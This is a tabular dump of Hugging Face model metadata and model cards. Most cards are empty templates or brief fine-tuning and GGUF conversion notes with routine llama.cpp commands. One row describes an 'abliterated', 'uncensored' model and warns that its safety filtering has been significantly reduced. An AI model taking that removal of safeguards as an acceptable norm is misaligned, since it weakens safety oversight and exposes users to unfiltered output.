modelId
stringlengths
5
139
author
stringlengths
2
42
last_modified
timestamp[us, tz=UTC]date
2020-02-15 11:33:14
2025-08-02 00:43:11
downloads
int64
0
223M
likes
int64
0
11.7k
library_name
stringclasses
548 values
tags
listlengths
1
4.05k
pipeline_tag
stringclasses
55 values
createdAt
timestamp[us, tz=UTC]date
2022-03-02 23:29:04
2025-08-02 00:35:11
card
stringlengths
11
1.01M
Rhulli/gemma-2b-it-finetuned
Rhulli
2025-06-11T11:49:18Z
0
0
peft
[ "peft", "safetensors", "arxiv:1910.09700", "base_model:google/gemma-2b-it", "base_model:adapter:google/gemma-2b-it", "region:us" ]
null
2025-06-11T11:47:08Z
--- base_model: google/gemma-2b-it library_name: peft --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed] ### Framework versions - PEFT 0.11.1
kcrl/Qwen2.5-3B-Instruct
kcrl
2025-06-11T11:48:38Z
0
0
transformers
[ "transformers", "safetensors", "text-generation-inference", "unsloth", "qwen2", "trl", "en", "license:apache-2.0", "endpoints_compatible", "region:us" ]
null
2025-06-11T09:43:43Z
--- base_model: unsloth/qwen2.5-3b-instruct-unsloth-bnb-4bit tags: - text-generation-inference - transformers - unsloth - qwen2 - trl license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** kcrl - **License:** apache-2.0 - **Finetuned from model :** unsloth/qwen2.5-3b-instruct-unsloth-bnb-4bit This qwen2 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
volfenstein/LORA-simple-stories-generator
volfenstein
2025-06-11T11:45:19Z
0
0
transformers
[ "transformers", "safetensors", "llama", "text-generation", "conversational", "arxiv:1910.09700", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-06-11T10:24:40Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
ibrahimbukhariLingua/qwen2.5-3b-en-wikipedia-finance_reasoning_distilled-1000-v4
ibrahimbukhariLingua
2025-06-11T11:44:20Z
0
0
transformers
[ "transformers", "safetensors", "generated_from_trainer", "trl", "sft", "base_model:Qwen/Qwen2.5-3B-Instruct", "base_model:finetune:Qwen/Qwen2.5-3B-Instruct", "endpoints_compatible", "region:us" ]
null
2025-06-11T11:44:08Z
--- base_model: Qwen/Qwen2.5-3B-Instruct library_name: transformers model_name: qwen2.5-3b-en-wikipedia-finance_reasoning_distilled-1000-v4 tags: - generated_from_trainer - trl - sft licence: license --- # Model Card for qwen2.5-3b-en-wikipedia-finance_reasoning_distilled-1000-v4 This model is a fine-tuned version of [Qwen/Qwen2.5-3B-Instruct](https://huggingface.co/Qwen/Qwen2.5-3B-Instruct). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="ibrahimbukhariLingua/qwen2.5-3b-en-wikipedia-finance_reasoning_distilled-1000-v4", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure This model was trained with SFT. ### Framework versions - TRL: 0.18.1 - Transformers: 4.52.4 - Pytorch: 2.7.1 - Datasets: 3.6.0 - Tokenizers: 0.21.1 ## Citations Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
alejo03/proyectoIA-tokenizer-v3
alejo03
2025-06-11T11:32:56Z
0
0
transformers
[ "transformers", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-06-11T11:32:49Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
alejo03/proyectoIA-modelo-v3
alejo03
2025-06-11T11:32:47Z
0
0
transformers
[ "transformers", "safetensors", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-06-11T11:32:32Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
MinaMila/llama_instbase_unlearned_ug2_e-6_1.0_0.5_0.25_0.25_ep2_LoRa_ACSEmployment_2_cfda_ep6_22
MinaMila
2025-06-11T11:32:16Z
0
0
transformers
[ "transformers", "safetensors", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-06-11T11:32:12Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
PathFinderKR/GPT2-small-2025-06-09_21-14-00
PathFinderKR
2025-06-11T11:31:21Z
0
0
null
[ "safetensors", "gpt2", "model_hub_mixin", "pytorch_model_hub_mixin", "region:us" ]
null
2025-06-10T20:59:00Z
--- tags: - model_hub_mixin - pytorch_model_hub_mixin --- This model has been pushed to the Hub using the [PytorchModelHubMixin](https://huggingface.co/docs/huggingface_hub/package_reference/mixins#huggingface_hub.PyTorchModelHubMixin) integration: - Code: [More Information Needed] - Paper: [More Information Needed] - Docs: [More Information Needed]
JYNGAA13/123
JYNGAA13
2025-06-11T11:30:40Z
0
0
null
[ "license:bigscience-openrail-m", "region:us" ]
null
2025-06-11T11:30:40Z
--- license: bigscience-openrail-m ---
phospho-app/vaileriy-ACT_BBOX-lerobot3-9pqta
phospho-app
2025-06-11T11:30:35Z
0
0
null
[ "safetensors", "phosphobot", "act", "region:us" ]
null
2025-06-11T10:51:48Z
--- tags: - phosphobot - act task_categories: - robotics --- # act Model - phospho Training Pipeline ## This model was trained using **phospho**. Training was successfull, try it out on your robot! ## Training parameters: - **Dataset**: [phospho-app/lerobot3_bboxes](https://huggingface.co/datasets/phospho-app/lerobot3_bboxes) - **Wandb run URL**: None - **Epochs**: None - **Batch size**: 100 - **Training steps**: 10000 📖 **Get Started**: [docs.phospho.ai](https://docs.phospho.ai?utm_source=huggingface_readme) 🤖 **Get your robot**: [robots.phospho.ai](https://robots.phospho.ai?utm_source=huggingface_readme)
SERGIO1945/my_lora_model
SERGIO1945
2025-06-11T11:30:18Z
0
0
transformers
[ "transformers", "safetensors", "text-generation-inference", "unsloth", "qwen3", "trl", "en", "license:apache-2.0", "endpoints_compatible", "region:us" ]
null
2025-06-11T11:29:49Z
--- base_model: unsloth/qwen3-14b-unsloth-bnb-4bit tags: - text-generation-inference - transformers - unsloth - qwen3 - trl license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** SERGIO1945 - **License:** apache-2.0 - **Finetuned from model :** unsloth/qwen3-14b-unsloth-bnb-4bit This qwen3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
Triangle104/Homunculus-abliterated-Q6_K-GGUF
Triangle104
2025-06-11T11:29:38Z
0
0
transformers
[ "transformers", "gguf", "distillation", "/think", "/nothink", "reasoning-transfer", "arcee-ai", "chat", "abliterated", "uncensored", "llama-cpp", "gguf-my-repo", "en", "base_model:huihui-ai/Homunculus-abliterated", "base_model:quantized:huihui-ai/Homunculus-abliterated", "license:apache-2.0", "endpoints_compatible", "region:us", "conversational" ]
null
2025-06-11T11:28:57Z
--- language: - en license: apache-2.0 library_name: transformers base_model: huihui-ai/Homunculus-abliterated tags: - distillation - /think - /nothink - reasoning-transfer - arcee-ai - chat - abliterated - uncensored - llama-cpp - gguf-my-repo extra_gated_prompt: '**Usage Warnings** “**Risk of Sensitive or Controversial Outputs**“: This model’s safety filtering has been significantly reduced, potentially generating sensitive, controversial, or inappropriate content. Users should exercise caution and rigorously review generated outputs. “**Not Suitable for All Audiences**:“ Due to limited content filtering, the model’s outputs may be inappropriate for public settings, underage users, or applications requiring high security. “**Legal and Ethical Responsibilities**“: Users must ensure their usage complies with local laws and ethical standards. Generated content may carry legal or ethical risks, and users are solely responsible for any consequences. “**Research and Experimental Use**“: It is recommended to use this model for research, testing, or controlled environments, avoiding direct use in production or public-facing commercial applications. “**Monitoring and Review Recommendations**“: Users are strongly advised to monitor model outputs in real-time and conduct manual reviews when necessary to prevent the dissemination of inappropriate content. “**No Default Safety Guarantees**“: Unlike standard models, this model has not undergone rigorous safety optimization. huihui.ai bears no responsibility for any consequences arising from its use.' --- # Triangle104/Homunculus-abliterated-Q6_K-GGUF This model was converted to GGUF format from [`huihui-ai/Homunculus-abliterated`](https://huggingface.co/huihui-ai/Homunculus-abliterated) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space. Refer to the [original model card](https://huggingface.co/huihui-ai/Homunculus-abliterated) for more details on the model. ## Use with llama.cpp Install llama.cpp through brew (works on Mac and Linux) ```bash brew install llama.cpp ``` Invoke the llama.cpp server or the CLI. ### CLI: ```bash llama-cli --hf-repo Triangle104/Homunculus-abliterated-Q6_K-GGUF --hf-file homunculus-abliterated-q6_k.gguf -p "The meaning to life and the universe is" ``` ### Server: ```bash llama-server --hf-repo Triangle104/Homunculus-abliterated-Q6_K-GGUF --hf-file homunculus-abliterated-q6_k.gguf -c 2048 ``` Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well. Step 1: Clone llama.cpp from GitHub. ``` git clone https://github.com/ggerganov/llama.cpp ``` Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux). ``` cd llama.cpp && LLAMA_CURL=1 make ``` Step 3: Run inference through the main binary. ``` ./llama-cli --hf-repo Triangle104/Homunculus-abliterated-Q6_K-GGUF --hf-file homunculus-abliterated-q6_k.gguf -p "The meaning to life and the universe is" ``` or ``` ./llama-server --hf-repo Triangle104/Homunculus-abliterated-Q6_K-GGUF --hf-file homunculus-abliterated-q6_k.gguf -c 2048 ```
JYNGAA13/No
JYNGAA13
2025-06-11T11:27:29Z
0
0
null
[ "license:apache-2.0", "region:us" ]
null
2025-06-11T11:27:29Z
--- license: apache-2.0 ---
tinh2406/full_llama2_split_merged-Q4_K_M-GGUF
tinh2406
2025-06-11T11:25:53Z
0
0
transformers
[ "transformers", "gguf", "llama-cpp", "gguf-my-repo", "base_model:tinh2406/full_llama2_split_merged", "base_model:quantized:tinh2406/full_llama2_split_merged", "endpoints_compatible", "region:us" ]
null
2025-06-11T11:25:28Z
--- library_name: transformers tags: - llama-cpp - gguf-my-repo base_model: tinh2406/full_llama2_split_merged --- # tinh2406/full_llama2_split_merged-Q4_K_M-GGUF This model was converted to GGUF format from [`tinh2406/full_llama2_split_merged`](https://huggingface.co/tinh2406/full_llama2_split_merged) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space. Refer to the [original model card](https://huggingface.co/tinh2406/full_llama2_split_merged) for more details on the model. ## Use with llama.cpp Install llama.cpp through brew (works on Mac and Linux) ```bash brew install llama.cpp ``` Invoke the llama.cpp server or the CLI. ### CLI: ```bash llama-cli --hf-repo tinh2406/full_llama2_split_merged-Q4_K_M-GGUF --hf-file full_llama2_split_merged-q4_k_m.gguf -p "The meaning to life and the universe is" ``` ### Server: ```bash llama-server --hf-repo tinh2406/full_llama2_split_merged-Q4_K_M-GGUF --hf-file full_llama2_split_merged-q4_k_m.gguf -c 2048 ``` Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well. Step 1: Clone llama.cpp from GitHub. ``` git clone https://github.com/ggerganov/llama.cpp ``` Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux). ``` cd llama.cpp && LLAMA_CURL=1 make ``` Step 3: Run inference through the main binary. ``` ./llama-cli --hf-repo tinh2406/full_llama2_split_merged-Q4_K_M-GGUF --hf-file full_llama2_split_merged-q4_k_m.gguf -p "The meaning to life and the universe is" ``` or ``` ./llama-server --hf-repo tinh2406/full_llama2_split_merged-Q4_K_M-GGUF --hf-file full_llama2_split_merged-q4_k_m.gguf -c 2048 ```
yahyaahmed/tinyllama-lora-dpo_8_5e-04_2_lora8_qkvogud
yahyaahmed
2025-06-11T11:24:01Z
0
0
transformers
[ "transformers", "safetensors", "generated_from_trainer", "trl", "dpo", "arxiv:2305.18290", "base_model:TinyLlama/TinyLlama-1.1B-Chat-v1.0", "base_model:finetune:TinyLlama/TinyLlama-1.1B-Chat-v1.0", "endpoints_compatible", "region:us" ]
null
2025-06-11T09:44:24Z
